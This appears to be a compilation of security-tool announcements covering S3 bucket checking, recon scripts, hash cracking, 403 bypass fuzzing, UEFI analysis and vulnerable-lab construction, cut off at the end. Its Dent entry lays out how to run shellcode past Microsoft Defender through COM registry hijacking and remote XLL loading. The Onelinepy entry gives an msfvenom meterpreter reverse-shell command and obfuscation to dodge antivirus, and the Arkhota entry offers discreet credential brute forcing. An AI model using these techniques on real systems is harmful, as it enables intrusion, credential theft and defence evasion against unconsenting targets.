
Bucky - An Automatic S3 Bucket Discovery Tool



Bucky is an automatic tool designed to discover S3 bucket misconfigurations. Bucky consists of two modules: the Bucky Firefox add-on and the Bucky backend engine. The add-on reads the source code of web pages and uses regular expressions (regex) to match S3 buckets used as a Content Delivery Network (CDN), then sends them to the Bucky backend engine. The backend engine receives the data from the add-on and checks whether each S3 bucket is publicly writable. If a bucket is vulnerable, Bucky automatically uploads a text file as a Proof of Concept (PoC).
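
The add-on itself ships as browser JavaScript, but the matching step is easy to picture. Below is a minimal Python sketch of the idea, assuming two common S3 URL styles; the patterns are illustrative, not the add-on's actual regex:

import re

# Two common S3 URL shapes: virtual-hosted-style and path-style.
# These patterns are illustrative; the add-on's actual regex may differ.
S3_PATTERNS = [
    re.compile(r"https?://([a-z0-9.-]+)\.s3[\w.-]*\.amazonaws\.com"),  # bucket.s3.amazonaws.com
    re.compile(r"https?://s3[\w.-]*\.amazonaws\.com/([a-z0-9.-]+)"),   # s3.amazonaws.com/bucket
]

def find_buckets(page_source):
    """Return the set of S3 bucket names referenced in a page's source."""
    buckets = set()
    for pattern in S3_PATTERNS:
        buckets.update(pattern.findall(page_source))
    return buckets

print(find_buckets('<img src="https://assets.example-cdn.s3.amazonaws.com/logo.png">'))
# {'assets.example-cdn'}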


Working

The Bucky add-on sends the names of S3 buckets discovered on the web pages a user visits to the backend engine, which uses the AWS PHP SDK to discover misconfiguration. Users can also check for S3 bucket misconfiguration manually. All results from automatic and manual checks are populated to the dashboard.
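
The actual check uses the AWS PHP SDK, but the essence of a public-write test can be sketched as an unauthenticated PUT of a small PoC object. A minimal Python sketch; the bucket and object names are illustrative assumptions:

import requests

def is_publicly_writable(bucket):
    """Attempt an unauthenticated PUT; HTTP 200 means the bucket accepts public writes."""
    url = f"https://{bucket}.s3.amazonaws.com/bucky-poc.txt"  # illustrative object name
    resp = requests.put(url, data=b"PoC: this bucket allows public writes", timeout=10)
    return resp.status_code == 200

if is_publicly_writable("example-bucket"):  # illustrative bucket name
    print("Vulnerable: PoC file uploaded")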

Check out the video: https://vimeo.com/444442588


Installation
git clone https://github.com/smaranchand/bucky.git
cd bucky

Requirements: AWS Access Keys and PHP installation

Get AWS Access Keys: https://console.aws.amazon.com/iam/home?#/security_credentials

PHP installation: Install according to your OS, apt install php7.3 / brew install php7.3

Currently, the Bucky add-on is not published in the Firefox add-on store; a link will be provided as soon as it is published.

For now, users can manually load the add-on into the browser. To do so:

  1. Open Firefox browser and visit about:debugging
  2. Click on "This Firefox" > Load Temporary Add-on
  3. Select the addon located at bucky/addon/bucky.js

Add AWS Access keys:

cd bucky/
nano config.inc.php
Add your AWS Access Key ID and Secret Access Key (on lines 57 and 61).

Usage

To use Bucky, load the Bucky add-on in the browser and start the backend engine.

cd bucky/
chmod +x run.sh
./run.sh

The backend engine runs on http://127.0.0.1:13337
As you browse websites, Bucky will discover S3 buckets automatically and reflect them in the dashboard.
Visit the address above to access the Bucky dashboard.

Screenshots

Running Bucky


Loading Addon


User Interface

 

All Buckets


Manual Check


POC By Bucky

 

Note

Bucky is not a perfect tool for discovering S3 buckets; it is well known that Bucky lacks many features and may sometimes fail to detect a misconfiguration. Changes and further development are in the pipeline. Feedback and contributions are greatly appreciated.




magicRecon - A Powerful Shell Script To Maximize The Recon And Data Collection Process Of An Objective And Finding Common Vulnerabilities



MagicRecon is a powerful shell script to maximize the recon and data collection process on a target and to find common vulnerabilities, saving the results in an organized way in directories and in various formats.

The new version of MagicRecon includes a large number of new tools to automate as much as possible of the process of collecting data on a target and searching for vulnerabilities. It also has a menu where the user can select which option they want to execute.

This new version also has the option of "Install dependencies" with which the user can easily install all the tools and dependencies that are needed to run MagicRecon. The script code has been made in a modular way so that any user can modify it to their liking. With MagicRecon you can easily find:

  • Sensitive information disclosure.
  • Missing HTTP headers.
  • Open S3 buckets.
  • Subdomain takeovers.
  • SSL/TLS bugs.
  • Open ports and services.
  • Email spoofing.
  • Endpoints.
  • Directories.
  • Juicy files.
  • Javascript files with sensitive info.
  • CORS misconfigurations.
  • Cross-site scripting (XSS).
  • Open Redirect.
  • SQL Injection.
  • Server-side request forgery (SSRF).
  • CRLF Injection.
  • Remote Code Execution (RCE).
  • Other bugs.

Disclaimer

The author of this document takes no responsibility for correctness. This project is merely here to help guide security researchers toward determining whether something is vulnerable or not, but does not guarantee accuracy. Warning: this code was originally created for personal use; it generates a substantial amount of traffic, so please use it with caution.


Requirements

To run the project, you will need to install the following tools:


IMPORTANT: Remember to configure the Notify and Subfinder tools to work properly.

Usage
./magicRecon.sh

Output:

__ __ _ ____
| \/ | __ _ __ _(_) ___| _ \ ___ ___ ___ _ __
| |\/| |/ _` |/ _` | |/ __| |_) / _ \/ __/ _ \| '_ \
| | | | (_| | (_| | | (__| _ < __/ (_| (_) | | | |
|_| |_|\__,_|\__, |_|\___|_| \_\___|\___\___/|_| |_|
|___/

MENU
1) Install dependencies
2) Massive vulnerability analysis with notifications via Discord, Telegram or Slack
3) Subdomain enumeration
4) Subdomain enumeration and vulnerability scanning with nuclei
5) Subdomain enumeration with common vulnerabilities scanning
6) Scan for javascript files
7) Scan for files and directories
8) All in one! (original MagicRecon)
q) Exit
Choose a option:






Dent - A Framework For Creating COM-based Bypasses Utilizing Vulnerabilities In Microsoft's WDATP Sensors



More Information

If you want to learn more about the techniques utilized in this framework, please take a look at this article.


Description

This framework generates code to exploit vulnerabilities in Microsoft Defender Advanced Threat Protection's Attack Surface Reduction (ASR) rules to execute shellcode without being detected or prevented. ASR was designed to be the first line of defense, detecting events based on actions that violate a set of rules. These rules focus on specific behavior indicators on the endpoint that are often associated with an attacker’s Tactics, Techniques, or Procedures (TTPs). These rules have a heavy focus on the Microsoft Office suite, as this is a common attack vector for establishing a remote foothold on an endpoint. A lot of the rule-based controls focus on network-based or process-based behavior indicators that stand out from normal business operation. These rules focus on either the initial compromise of a system or a technique that can severely impact an organization (e.g., disclosure of credentials or ransomware). They cover a large amount of the common attack surface and focus on hampering known techniques used to compromise assets.

Dent takes advantage of several vulnerabilities to bypass these restrictive controls and execute payloads on an endpoint without being blocked or effectively detected by Microsoft Defender Advanced Threat Protection sensors. The article above outlines the vulnerabilities that are STILL present in Microsoft Defender Advanced Threat Protection even after disclosure.


Install

The first step as always is to clone the repo, then build it

go build Dent.go

Help
./Dent -h

________ __
\______ \ ____ _____/ |_
| | \_/ __ \ / \ __\
| | \ ___/| | \ |
/_______ /\___ >___| /__|
\/ \/ \/
(@Tyl0us)

"Call someone a hero long enough, and they'll believe it. They'll become it.
They have no choice. Let them call you a monster, and you become a monster."


Usage of ./Dent:
-C string
Name of the COM object.
-N string
Name of the XLL payload when it's written to disk.
-O string
Name of the output file. (default "output.txt")
-P string
Path of the DLL for your COM object. (Either use \\ or '' around the path)
-U string
URL where the base64 encoded XLL payload is hosted.
-show
Display the script in the terminal.

Weaponizing

This framework is intended for exploiting vulnerabilities and deficiencies in Microsoft Defender Advanced Threat Protection; because of that, it does not actually generate any payloads/implants. To generate those, you can use any of a large number of publicly available tools; however, all research, development and testing was done using ScareCrow. Microsoft Defender Advanced Threat Protection doesn't rely on userland hooking for telemetry; rather, it utilizes various other mechanisms such as kernel callbacks. From testing, this framework works extremely well at bypassing Microsoft Defender Advanced Threat Protection to execute shellcode.


Techniques

At the time of release there are two techniques. I will be adding new ones that utilize these vulnerabilities in different ways periodically, so please stay tuned for more.


Fake COM Object Mode

COM objects are often created when an application is installed on a system. Once created, any application or script can call them; however, installation isn't the only way to create them. By modifying/creating registry keys in the HKEY_CLASSES_ROOT section of the Windows Registry, we can create a COM object that points to our shellcode on the system. This means any application or script that can utilize COM can call it, executing the shellcode.

This works because of how the CoCreateInstance API functions. CoCreateInstance is used to create and initialize COM objects based on the CLSID (a globally unique identifier used to identify a specific COM class object). This function pulls the information needed to execute the call from values stored in registry keys. These CLSID values can be found under the HKEY_CLASSES_ROOT\CLSID\ path of the registry. However, before a process can call the CLSID, it must know that CLSID's value. This is done by first performing a registry query to look for the COM object in HKEY_CLASSES_ROOT\<COM object name>, and if it exists, a second registry query will be made to get the CLSID value stored in the subfolder.

Further inspection of the registry's subfolders shows that the permissions on the CLSID values are not consistent. A large majority of COM objects stored here only allow “Full Control” permission to the Trusted Installer. The Trusted Installer is a service account that owns resources to protect them, even from Administrators. This is intended to ensure that even if an attacker obtains administrative privileges, the resources cannot be manipulated maliciously. Unfortunately, a lot of COM objects allow anyone in the Administrators group “Full Control” permission. In addition, the root key CLSID grants the Administrators group “Full Control” rather than NT AUTHORITY\System or Trusted Installer. Because of this, under an elevated context we can create, or even modify, specific COM object values.
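
Dent emits a .VBS script to do this; the registry layout it abuses can be sketched with Python's standard winreg module (Windows-only, and it must run elevated, as the Important note below explains; the ProgID, CLSID and DLL path here are placeholders, not Dent's output):

import winreg  # Windows-only standard library module; run from an elevated context

PROG_ID = "Fake.Object"                           # placeholder COM object name (-C)
CLSID = "{11111111-2222-3333-4444-555555555555}"  # placeholder CLSID
DLL_PATH = r"C:\path\to\payload.dll"              # placeholder DLL path (-P)

# HKCR\<ProgID>\CLSID holds the CLSID that callers resolve first
with winreg.CreateKey(winreg.HKEY_CLASSES_ROOT, PROG_ID + r"\CLSID") as key:
    winreg.SetValueEx(key, "", 0, winreg.REG_SZ, CLSID)

# HKCR\CLSID\<CLSID>\InprocServer32 names the DLL that CoCreateInstance will load
with winreg.CreateKey(winreg.HKEY_CLASSES_ROOT, rf"CLSID\{CLSID}\InprocServer32") as key:
    winreg.SetValueEx(key, "", 0, winreg.REG_SZ, DLL_PATH)
    winreg.SetValueEx(key, "ThreadingModel", 0, winreg.REG_SZ, "Both")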


 

Important

The creation of these registry keys only works if you run it in an elevated context. Double-clicking through the GUI will not execute the .VBS file in an elevated context even if you are an administrator. It is recommended you run it from an administrative shell or command prompt. However, once the keys are created, any application can call this COM object under any context.


ScareCrow Weaponizing

To utilize a ScareCrow payload with this type of bypass you can run the following command:

./ScareCrow -I <path to your raw stageless shellcode>  -domain <domain name> -Loader dll

Usage

Once you have your payload, use the -N flag for the name of the payload when it's written to disk, the -C flag for the name of the COM object, the -I flag for the location to write it to, and lastly the -O for the output file to store the content.


Remote .XLL Payload Mode

This option generates a block of code that bypasses several ASR rules to download, write to disk, load and execute shellcode, bypassing ASR preventative controls. This is done using the Excel.Application COM object, which represents the entire Excel application in an automated form and allows programmatic interaction with it. Because this is still Excel, it does not trigger the ASR rule. This is because when we call Excel.Application, we can see that it spawns under a Service Host process (Svchost.exe) and not the WinWord.exe process. While Svchost.exe is a system-level process used to host multiple Windows-based services, the child process created (Excel.exe) did not gain system-level privileges.

Because we created a COM object that was an entire application, the Excel process was created under Svchost.exe so it could be handled properly to prevent any instabilities to the WinWord.exe process. Though this process is under Svchost.exe, there is another challenge to contend with: executing shellcode. As binary execution or using WinAPI inside a macro will trigger other ASR rules, this limits what we can do without triggering an ASR rule or getting caught by WDAPT's EDR component. This is where DLLs shine. If a DLL-based payload is compiled with the right export functions, it can be used as an Office plugin that, when loaded, will automatically run shellcode. To do this, we can utilize Excel's RegisterXLL function. The RegisterXLL function loads an XLL plugin into memory, automatically registering and executing it. XLL files are essentially Excel-based DLLs.

To get the content onto the system, we can use another COM object (Microsoft.XMLHTTP), gaining the ability to execute an HTTP request, in this case an HTTP GET request to a URL. A second COM object (ADODB.Stream) provides the ability to read/write bytes of a data stream. By combining the two COM objects, an attacker can request a remote resource through an HTTP GET request and write the response (in this case, the file itself) to disk. The ADODB.Stream object is used again to handle the read/write bytes of the data stream, while another COM object (Microsoft.XMLDOM) allows the reading of data stored in a file. The XMLDOM object allows the data type to be set (in this case, base64), and once the content is opened and stored in a string with the proper data type, the ADODB.Stream object can write the string of code to disk using a different data type (in this case, BinaryStreamType), converting the base64 string back into binary form.
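
Dent's generated code drives these COM objects from script; for testing, the final RegisterXLL step can be reproduced from Python via pywin32 (a minimal sketch, assuming pywin32 is installed and an XLL already sits at the placeholder path):

import win32com.client  # pip install pywin32

# Automated Excel instance; as noted above, it appears under svchost.exe
excel = win32com.client.Dispatch("Excel.Application")
excel.Visible = False

# RegisterXLL loads the XLL add-in into memory and runs its auto-open export
loaded = excel.RegisterXLL(r"C:\path\to\AppWiz.xll")  # placeholder path
print("XLL loaded" if loaded else "load failed")
excel.Quit()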


ScareCrow Weaponizing

To utilize a ScareCrow payload with this type of bypass you can run the following command:

./ScareCrow -I <path to your raw stageless shellcode>  -domain <domain name> -Loader excel  -O <Output filename>

Once generated, copy lines 13 and 14 from the output file and merge them together, making sure to remove:

  • the var <variable name>
  • the ; at the end of each line
  • the quotes around each string



Usage

Once you have your encoded payload, use the -N flag for the name of the payload when it's written to disk, the -U flag for the URL the encoded payload is going to be hosted on (i.e. https:///), and the -F flag for the name of the file being hosted by the site. The outputted code is designed to work in a macro document.


Lack of WDATP Sensor Recording

Through further investigation, it was observed that this is not a gap in WDATP's sensors; WDATP does have visibility into this activity, but it is ignored. Looking through a WDATP endpoint's timeline of events for any reference to Appwiz.xll, we observed that WDATP recorded a “created file” event when Word created the file AppWiz.xll. It is important to note that .XLL files are executable.


Disclosure Time

11/20/2020 - Research development and article written.

03/14/2021 - Provided Microsoft a preliminary disclosure document outlining identified issues.

03/31/2021 - Microsoft recognized and acknowledged that the vulnerabilities related to spawning an Office child process and writing files to disk were real vulnerabilities and began working on remediation. However, the permissions inconsistencies in the registry were deemed not a vulnerability due to the requirement of elevated privileges.

04/21/2021 - Microsoft informed the author that signature build 1.333.1055.0 released on 03/22/2021 and 1.335.1321.0 released on 04/21/2021 contained the detection for the Office application-based vulnerabilities and closed the case.

04/22/2021 - The author retested the same techniques identifying that the vulnerabilities were still present.



Arkhota - A Web Brute Forcer For Android



What?

Arkhota is a web (HTTP/S) brute forcer for Android.


Why?

A web brute forcer is always in a hacker's toolkit, for obvious reasons. Sometimes attacks need to be quick and/or done with minimal device preparation. A phone also draws less attention than a laptop or computer. For these situations, here's Arkhota.


Download

You can download the APK there.


Usage

The explanation follows the order of objects in the APK, from top to bottom.


Banner
  • Banner, version & author

You can long-click the version to see the about page.


Connection
  • URL (required)

The URL to request.

  • Body

You need to specify a body if you are going to make a POST request.


Userlist / Wordlist
  • Userlist selector

Single: Sets a single username

Generate: Generates runtime with given options

Wordlists: Sets prepared wordlist

Custom wordlist: You can place your custom wordlist in /sdcard/ABF/.

Then this selector will list it (if the required permissions are given).

  • Username box

You need to specify a username if you selected Single.

  • Charset selectors

[W] You need to specify a charset and min & max lengths to generate at runtime.

If you selected Generate, the checkboxes will help you select.

  • Prefix & Suffix

You can specify a prefix & suffix to be added to your username.


The same applies to the password part too.

Configuration
  • Beep switch

Beeps if the attack succeeds.

  • Fail/Success switch

Decides how the connection response is interpreted (see Important below).

  • POST/GET switch

Decides the request type.

  • User-Agent

Sets the user-agent for the connection.

If "Original UA" is set, then the original user-agent is used.

Otherwise the given text will be set as the user-agent.


Tip: it has autocompletion for several user-agents, all of which start with "Mozilla". Type and select one if you don't want to expose your original UA but don't know what to set.
  • Timeout

Sets the timeout for the connection, in milliseconds.

  • Cookie

Sets the cookie value for the connection.

  • Regex (required)

Determines what to look for in the connection response.

  • Empty box

Tried username:password pairs and the result will be shown there.

  • [W] Start

Starts attack!


Important

URL & Body: ^USER^ and ^PASS^ are placeholders for the username and password. You need to place them in the URL or the body (depending on the request type you chose).

Regex & Fail/Success switch: these two determine the result of the attack.

If the switch points to "Fail" and the given regex is found in the response, the attempt is a failure; the attack continues.

If the switch points to "Success" and the given regex is found in the response, it's a success! The result is written to the empty box (in the format "FOUND: username:password") and the attack stops.

Copying: long-clicking the empty box copies its content. If a password was found, it is copied in username:password format; otherwise the whole content is copied.

If the attack finishes unsuccessfully, it just stops at the last user:password pair.
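
Arkhota itself is an Android app, but the placeholder-and-regex loop described above is compact enough to sketch in Python (the URL, regex and word lists here are illustrative assumptions):

import re
import requests

URL = "http://example.com/login?user=^USER^&pass=^PASS^"  # GET request with placeholders
FAIL_REGEX = re.compile("Invalid credentials")            # "Fail" mode: a match means keep going

for user in ["admin"]:
    for password in ["123456", "letmein", "hunter2"]:
        target = URL.replace("^USER^", user).replace("^PASS^", password)
        resp = requests.get(target, timeout=5)
        if not FAIL_REGEX.search(resp.text):  # regex absent -> not a failure -> success
            print(f"FOUND: {user}:{password}")
            break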


Screenshots & Videos



[W]arning

Runtime changeable parameters

Every parameter is editable during an attack, but edits take effect only on the next start, with two exceptions: the "Fail/Success" and "Beep" switches.

This means: if you started the attack and want to change a parameter (e.g. the charset), editing it will not change anything; the change applies only after pressing the start button again. BUT if you started the attack with the beep option on and want to change that, you don't need to restart the attack; just flip the switch and it won't beep when the attack succeeds.


About "Generate" & Custom wordlists

The Generate option is NOT recommended. Generating and parsing at runtime is really hard work for a phone. It is also not stable: all possible words will be generated, but they may not be sequential. If you really need to select it, keep every option at its minimum. If your phone freezes or crashes, you'll know the selected options are not suitable for your phone's processor.

Do NOT place big wordlists in the /ABF/ directory. This will cause freezing & crashing.

And do NOT forget that standard smartphones have far less processing power than a computer; this project is for small and quick attacks.


About speed

Depends on the speed of your network and of the remote host.


How to stop the attack

This version of Arkhota doesn't support stopping an attack, BUT that doesn't mean you cannot stop one. Just flip the "Fail/Success" switch to the opposite direction and wait for one more request. This causes a false positive on purpose, which stops the attack. Or you can simply close and re-open the application.


PS: I know.. I know... This project gave me a headache, I didn't even try to put a stop button there.


Onelinepy - Python Obfuscator To Generate One-Liners And FUD Payloads



 Python Obfuscator To Generate One-Liners And FUD Payloads.
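
The core trick behind a base64 one-liner is small enough to show in isolation. A minimal sketch of the technique (illustrative; onelinepy's exact output format may differ, and the -i flag simply feeds the result back through the same step):

import base64

code = "print('Hello from a one-liner!')"

# Encode the source, then emit a single expression that decodes and exec()s it.
encoded = base64.b64encode(code.encode()).decode()
one_liner = f"exec(__import__('base64').b64decode('{encoded}').decode())"

print(one_liner)  # the obfuscated one-liner
exec(one_liner)   # still runs the original code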

Download & Run
git clone https://github.com/spicesouls/onelinepy
cd onelinepy
chmod +x setup.sh
./setup.sh
onelinepy

Usage Guide
              _ _                 
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|

usage: oneline.py [-h] [-m M] [-i I] [--script SCRIPT] [--code CODE] [--list] [--output OUTPUT]

optional arguments:
-h, --help show this help message and exit
-m M Obfustucating Method (i.e, -m /one_line/base64)
-i I Iterations For Obfustucation.
--script SCRIPT File path of Python file to Obfustucate.
--code CODE Python code to Obfustucate.
--list List Obfustucating Methods.
--output OUTPUT Output File.

Example: Creating FUD Meterpreter Python Payload
  1. Generate Python Payload:

msfvenom --payload python/meterpreter_reverse_http LHOST=... LPORT=... > payload.txt

  2. Obfuscate the payload:

onelinepy -m /one_line/base64 --script payload.txt -i 3 --output obfustucated_payload.txt

  3. Profit! The obfuscated payload works against Windows Defender.

More Examples
onelinepy -m /one_line/base64 --script payload.py -i 3
onelinepy -m /one_line/hex --code "print('HEX!')"

Obfuscation Method List
              _ _                 
___ ___ ___| |_|___ ___ ___ _ _
| . | | -_| | | | -_| . | | | Python
|___|_|_|___|_|_|_|_|___| _|_ | Obfustucator
|_| |___|


Obfustucators ( * = May cause Syntax Errors )
-=============-
0 /one_line/hex
1 /one_line/base64
2 /one_line/base32
3 /one_line/gunzip*
4 /one_line/rot13*
5 /cmd/command
6 /cmd/powershell
7 /cmd/powershellhidden


403Fuzzer - Fuzz 403/401Ing Endpoints For Bypasses



Fuzz 403ing endpoints for bypasses


Follow on twitter! @intrudir

This tool will check the endpoint with a number of headers, such as X-Forwarded-For.

It will also apply different payloads typically used in directory traversals, path normalization etc. to each endpoint on the path,
e.g. /%2e/test/test2/, /test/%2e/test2/, /test;/test2/
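
A rough Python sketch of both payload classes, assuming a handful of representative values (the tool's real header and path lists are far longer):

import requests

url = "http://example.com/test1/test2/forbidden.html"

# Header-based bypass attempts (representative subset)
for headers in [
    {"X-Forwarded-For": "127.0.0.1"},
    {"X-Original-URL": "/forbidden.html"},
    {"X-Rewrite-URL": "/forbidden.html"},
]:
    resp = requests.get(url, headers=headers, timeout=5)
    print(resp.status_code, len(resp.content), headers)

# Path-mutation attempts applied to one segment (representative subset)
for segment in ["/%2e/test2/", "/test2;/", "/./test2/"]:
    mutated = url.replace("/test2/", segment)
    resp = requests.get(mutated, timeout=5)
    print(resp.status_code, len(resp.content), mutated)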


Usage
usage: 403fuzzer.py [-h] [-u URL] [-m {GET,POST,PUT,PATCH}] [-d DATA_PARAMS] [-c COOKIES] [-H HEADER] [-p PROXY] [-hc HC] [-hl HL] [-sf] [--save SAVE] [-sh] [-su]

use this script to fuzz endpoints that return a 401/403

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Specify the target URL
-m {GET,POST,PUT,PATCH}, --method {GET,POST,PUT,PATCH}
Specify the HTTP method/verb
-d DATA_PARAMS, --data DATA_PARAMS
Specify data to send with the request.
-c COOKIES, --cookies COOKIES
Specify cookies to use in requests. (e.g., --cookies "cookie1=blah; cookie2=blah")
-H HEADER, --header HEADER
Add headers to your request (e.g., --header "Accept: application/json" --header "Host: example.com"
-p PROXY, --proxy PROXY
Specify a proxy to use for requests (e.g., http://127.0.0.1:8080)
-hc HC Hide response code from output, single or comma separated
-hl HL Hide response length from output, single or comma separated
-sf, --smart Enable the smart filter
--save SAVE Saves stuff to a file when you get your specified response code
-sh, --skip-headers Skip testing bypass headers
-su, --skip-urls Skip testing path payloads


Basic examples
python3 403fuzzer.py -u http://example.com/test1/test2/test3/forbidden.html



Specify cookies to use in requests:

(minus the Cookie header name). Examples:

--cookies "cookie1=blah"
-c "cookie1=blah; cookie2=blah"


Specify a method/verb and body data to send
403fuzzer.py -u https://example.com -m POST -d "param1=blah&param2=blah2"
403fuzzer.py -u https://example.com -m PUT -d "param1=blah&param2=blah2"


Specify custom headers to use with every request

Maybe you need to add some kind of auth header like Authorization: Bearer <token>. Specify -H "header: value" for each additional header you'd like to add:

403fuzzer.py -u https://example.com -H "Some-Header: blah" -H "Authorization: Bearer 1234567"


Specify a proxy to use

Useful if you wanna proxy through Burp

403fuzzer.py -u https://example.com --proxy http://127.0.0.1:8080


Skip sending header payloads or url payloads
# skip sending headers payloads
403fuzzer.py -u https://example.com -sh
403fuzzer.py -u https://example.com --skip-headers

# Skip sending path normalization payloads
403fuzzer.py -u https://example.com -su
403fuzzer.py -u https://example.com --skip-urls


Hide response code/length

Provide comma delimited lists without spaces. Examples:

# Hide response codes
403fuzzer.py -u https://example.com -hc 403,404,400

# Hide response lengths of 638
403fuzzer.py -u https://example.com -hl 638


Smart filter feature!

Based on response code and length. If the same response is seen 8 times or more, it will automatically be muted. The repeat threshold is changeable in the code until an option to specify it via a flag is added. NOTE: can't be used simultaneously with -hc or -hl (yet)

# toggle smart filter on
403fuzzer.py -u https://example.com --smart
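
Conceptually the smart filter is just a counter keyed on (status code, response length); a minimal Python sketch using the threshold of 8 described above:

from collections import Counter

THRESHOLD = 8  # repeats allowed before a (code, length) pair is muted
seen = Counter()

def should_print(status_code, length):
    """Return False once the same (code, length) response has repeated too often."""
    seen[(status_code, length)] += 1
    return seen[(status_code, length)] < THRESHOLD

for _ in range(9):
    visible = should_print(403, 638)
print(visible)  # False: the repeated 403/638 response is now muted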


Save requests for matching response code

Will save to a file named saved.txt. Useful for later inspection.

 # save requests where the response code matched 200
403fuzzer.py -u https://example.com --save 200


TODO:
  • Add other methods/verbs for bypass, e.g. POST requests
  • Maybe add an output file option for 200 OKs
  • Looking for ideas. Ping me on twitter! @intrudir


Bn-Uefi-Helper - Helper Plugin For Analyzing UEFI Firmware



Helper plugin for analyzing UEFI firmware. This plugin contains the following features:

  • Apply the correct prototype to the entry point function
  • Fix segments so all segments are RWX and have the correct semantics
    • This allows for global function pointers to be rendered correctly
  • Apply types for core UEFI services (from EDK-II)
  • Locate known protocol GUIDs and assign the GUID type and a symbol (see the sketch after this list)
  • Locate global assignments in entry and initialization functions and assign types
    • EFI_SYSTEM_TABLE, EFI_RUNTIME_SERVICES, EFI_BOOT_SERVICES, etc...
  • Loader for Terse Executables
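
Locating known GUIDs boils down to scanning the image for their 16-byte little-endian encodings. A standalone Python sketch of the idea, independent of the Binary Ninja API (the GUID shown is the well-known EFI_GRAPHICS_OUTPUT_PROTOCOL GUID; the input filename is a placeholder):

import uuid

KNOWN_GUIDS = {
    "EFI_GRAPHICS_OUTPUT_PROTOCOL_GUID": uuid.UUID("9042a9de-23dc-4a38-96fb-7aded080516a"),
}

def find_guids(path):
    """Yield (name, offset) for every known GUID found in the file."""
    data = open(path, "rb").read()
    for name, guid in KNOWN_GUIDS.items():
        needle = guid.bytes_le  # GUIDs are stored little-endian in the image
        offset = data.find(needle)
        while offset != -1:
            yield name, offset
            offset = data.find(needle, offset + 1)

for name, offset in find_guids("firmware_module.efi"):  # placeholder filename
    print(f"{name} at offset {offset:#x}")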

Minimum Version

Tested on 2.3.2660



License

This plugin is released under a MIT license.


Related Projects


Penglab - Abuse Of Google Colab For Cracking Hashes



Abuse of Google Colab for fun and profit.


What is it?

Penglab is a ready-to-install setup on Google Colab for cracking hashes with incredible power; really useful for CTFs. (See benchmarks below.)

It installs by default:

  • Hashcat
  • John
  • Hydra
  • SSH (with ngrok)

And now, it can also:

  • Launch an integrated shell
  • Download the wordlists Rockyou and HashesOrg2019 quickly!

You only need a Google Account to use Google Colab, and to use ngrok for SSH (optional).


How to use it?
  1. Go to: https://colab.research.google.com/github/mxrch/penglab/blob/master/penglab.ipynb
  2. Select "Runtime", "Change runtime type", and set "Hardware accelerator" to GPU.
  3. Change the config by setting "True" for the tools you want to install.
  4. Select "Runtime" and "Run all"!

What is Google Colab?

Google Colab is a free cloud service, based on Jupyter Notebooks for machine-learning education and research. It provides a runtime fully configured for deep learning and free-of-charge access to a robust GPU.


Benchmarks

Hashcat Benchmark :
====================
* Device #1: Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU

OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]
========================================================================
* Device #2: Tesla P100-PCIE-16GB, skipped

Benchmark relevant options:
===========================
* --optimized-kernel-enable

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 55

Hashmode: 0 - MD5

Speed.#1.........: 27008.0 MH/s (69.17ms) @ Accel:64 Loops:512 Thr:1024 Vec:8

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 55

Hashmode: 100 - SHA1

Speed.#1.........: 9590.3 MH/s (48.61ms) @ Accel:8 Loops:1024 Thr:1024 Vec:1

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 55

Speedtest:
Testing from Google Cloud (35.203.136.151)...
Retrieving speedtest.net server list...
Selecting best server based on ping...
Hosted by KamaTera INC (Santa Clara, CA) [11.95 km]: 28.346 ms
Testing download speed... Download: 2196.68 Mbit/s
Testing upload speed... Upload: 3.87 Mbit/s



Metarget - Framework Providing Automatic Constructions Of Vulnerable Infrastructures



1 Introduction

Metarget = meta- + target, a framework providing automatic constructions of vulnerable infrastructures, used to deploy simple or complicated vulnerable cloud native targets swiftly and automatically.


1.1 Why Metarget?

During security research, we may find that deploying a vulnerable environment often takes a long time, while the time spent testing the PoC or exploit is comparatively short. In the field of cloud native security, due to the complexity of cloud native systems, this issue is even worse.

There are already some excellent security projects like Vulhub, VulApps in the open-source community, which pack vulnerable scenes into container images, so that researchers could utilize them and deploy scenes quickly.

However, these projects mainly focus on vulnerabilities in applications. What if we need to study the vulnerabilities in the infrastructures like Docker, Kubernetes and even Linux kernel?

Hence, we developed Metarget and hope to solve the deployment issue above to some extent. Furthermore, we also expect that Metarget could help to construct multilayer vulnerable cloud native scenes automatically.


1.2 Install Vulnerability!

In this project, we come up with concepts like installing vulnerabilities and installing vulnerable scenes. Why not install vulnerabilities just like installing software? We can do that, because our goals are security research and offensive security.

To be exact, we expect that:

  • metarget cnv install cve-2019-5736 will install Docker with CVE-2019-5736 onto the server.
  • metarget cnv install cve-2018-1002105 will install Kubernetes with CVE-2018-1002105 onto the server.
  • metarget cnv install kata-escape-2020 will install Kata-containers with CVE-2020-2023/2025/2026 onto the server.
  • metarget cnv install cve-2016-5195 will install a kernel with DirtyCoW onto the server.

It's cool, right? No more steps. No RTFM. Execute one command and enjoy your coffee.

Furthermore, we expect that:

  • with Metarget's help, ethical hackers are able to deploy simple or complicated cloud native targets swiftly and learn by hacking cloud native environments.
  • metarget appv install dvwa will install a DVWA target onto our vulnerable infrastructure.
  • metarget appv install thinkphp-5-0-23-rce --external will install a ThinkPHP RCE vulnerability with NodePort service onto our vulnerable infrastructure.

You can run just the 5 commands below after installing a fresh Ubuntu and obtain a multi-layer vulnerable scene:

./metarget cnv install cve-2016-5195 # container escape with dirtyCoW
./metarget cnv install cve-2019-5736 # container escape with docker
./metarget cnv install cve-2018-1002105 # kubernetes single-node cluster with cve-2018-1002105
./metarget cnv install privileged-container # deploy a privileged container
./metarget appv install dvwa --external # deploy dvwa target

RCE, container escape, lateral movement, persistence, they are yours now.

More awesome functions are coming! Stay tuned :)

Note:

This project aims to provide vulnerable scenes for security research. The security of the generated scenes is not guaranteed. It is NOT recommended to deploy components or scenes with Metarget on Internet-facing hosts.


2 Usage

2.1 Basic Usage
usage: metarget [-h] [-v] subcommand ...

automatic constructions of vulnerable infrastructures

positional arguments:
subcommand description
gadget cloud native gadgets (docker/k8s/...) management
cnv cloud native vulnerabilities management
appv application vulnerabilities management

optional arguments:
-h, --help show this help message and exit
-v, --version show program's version number and exit

Run ./metarget gadget list to see cloud native components supported currently.


2.2 Manage Cloud Native Components
usage: metarget gadget [-h] subcommand ...

positional arguments:
subcommand description
list list supported gadgets
install install gadgets
remove uninstall gadgets

optional arguments:
